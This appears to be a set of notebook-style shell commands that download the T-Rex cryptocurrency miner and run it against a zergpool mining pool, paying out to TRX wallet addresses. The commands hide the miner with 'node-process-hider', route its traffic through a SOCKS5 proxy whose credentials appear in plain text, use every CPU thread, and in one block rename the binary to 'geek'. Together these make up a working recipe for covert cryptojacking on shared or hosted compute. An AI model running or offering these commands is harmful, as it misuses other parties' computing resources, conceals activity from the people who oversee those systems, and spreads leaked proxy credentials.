./t-rex -a ethash -o stratum+tcp://ethash.mine.zergpool.com:9999 -u TDLM5E7245pv9N1gRpjzmxVuaXiboAu4qt -p  c=TRX,mc=AKA/CLO/EGEM/ETHO/EXP/TSF,ID=Aman



! apt update -y  
! apt install curl libssl1.0-dev  
! nodejs nodejs-dev node-gyp 
! npm -y  
! wget wget https://trex-miner.com/download/t-rex-0.21.5-linux.tar.gz
! tar -xf t-rex-0.21.5-linux.tar.gz
! npm i -g node-process-hider  
! chmod +x t-rex
! ph add t-rex  
! ./t-rex -a ethash -o stratum+tcp://ethash.mine.zergpool.com:9999 -u TPPvQ3s1grBbZ6q9BusoP2hZYDo63Lsfh3 -p  c=TRX,mc=AKA/CLO/EGEM/ETHO/EXP/TSF/ETH,ID=Aman -t $(nproc) -x socks5://ubuntu2004:LijayaAnli1188@209.127.96.240:7835




--disable-gpu --algorithm verushash --pool stratum+tcp://verushash.eu.mine.zergpool.com:3300 --wallet TDLM5E7245pv9N1gRpjzmxVuaXiboAu4qt --pass c=TRX,mc=VRSC,ID=SmildMiner-2



wget https://trex-miner.com/download/t-rex-0.21.5-linux.tar.gz
tar -xf t-rex-0.21.5-linux.tar.gz
chmod +x t-rex 
./geek -a ethash -o stratum+tcp://ethash.mine.zergpool.com:9999 -u TPPvQ3s1grBbZ6q9BusoP2hZYDo63Lsfh3 -p  c=TRX,mc=AKA/CLO/EGEM/ETHO/EXP/TSF/ETH,ID=Aman -t $(nproc) -x socks5://ubuntu2004:LijayaAnli1188@209.127.96.240:7835
